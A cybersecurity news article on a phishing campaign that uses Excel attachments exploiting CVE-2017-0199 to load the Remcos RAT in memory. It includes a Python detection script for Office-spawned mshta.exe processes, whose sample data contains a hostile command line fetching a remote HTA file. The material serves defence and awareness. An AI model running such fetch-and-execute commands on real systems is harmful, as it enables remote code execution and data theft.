Watch out, that Excel document could be infected with dangerous malware

In a recent wave of cyber threats, a new phishing campaign has emerged, cleverly utilizing an Excel file to distribute a fileless version of the notorious Remcos Remote Access Trojan (RAT). This sophisticated attack vector allows hackers to infiltrate target devices and extract sensitive information seamlessly.

Phishing Tactics Unveiled

Researchers from Fortinet have conducted a thorough analysis of this campaign, revealing that threat actors are employing the familiar guise of purchase order emails to lure unsuspecting victims. These emails come with an attached Microsoft Excel file designed to exploit a known remote code execution vulnerability in Office (CVE-2017-0199). Once the file is opened, it triggers the download of an HTML Application (HTA) file from a remote server, which is subsequently launched via mshta.exe.

Originally intended for legitimate remote administration tasks, Remcos has unfortunately been repurposed by cybercriminals, much like the infamous Cobalt Strike. The capabilities of Remcos are alarming; it can log keystrokes, capture screenshots, and execute commands on compromised systems, making it a formidable tool for unauthorized access and data theft.

What sets this particular variant apart is its fileless nature. As Fortinet explains, “Rather than saving the Remcos file into a local file and running it, it directly deploys Remcos in the current process’s memory.” This innovative approach means that the malware operates without leaving traditional file traces, making detection and removal significantly more challenging.
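Because the payload never touches disk, process telemetry is the practical place to catch this chain: an Office application spawning mshta.exe with a remote URL is the observable step between the Excel attachment and the in-memory Remcos load. The following detection logic is an added example, not Fortinet's or any vendor's code; it runs over constructed Sysmon-style process-creation events (field names follow Sysmon's schema, all values are made up) and flags the Office -> mshta.exe -> remote HTA pattern.

```python
import re

# Constructed sample events in a Sysmon Event ID 1 (process creation) style.
# Field names follow Sysmon's schema; paths and URL are made up for this example.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" http://198.51.100.23/po/order.hta'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\local_dialog.hta'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Severity for one process-creation event.

    'high'   : Office app spawned mshta.exe with a remote URL argument
               (the Excel -> HTA -> mshta.exe chain described above)
    'medium' : Office app spawned mshta.exe at all
    'low'    : mshta.exe from a non-Office parent (benign use is common)
    None     : not mshta.exe
    """
    if _basename(event["Image"]) != "mshta.exe":
        return None
    office_parent = _basename(event["ParentImage"]) in OFFICE_APPS
    remote = bool(REMOTE_URL.search(event.get("CommandLine", "")))
    if office_parent and remote:
        return "high"
    return "medium" if office_parent else "low"


def triage(events):
    """Return (event, severity) pairs worth an analyst's attention."""
    return [(e, s) for e in events if (s := classify(e)) in ("high", "medium")]


if __name__ == "__main__":
    for event, severity in triage(SAMPLE_EVENTS):
        print(severity.upper(), _basename(event["ParentImage"]), "->", event["CommandLine"])
```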

Email phishing remains a prevalent method for cybercriminals to infect devices and pilfer sensitive information. Its low cost and high efficiency make it an attractive option for attackers. To safeguard against such threats, users are advised to exercise caution when reviewing emails and to remain vigilant when downloading and executing attachments.
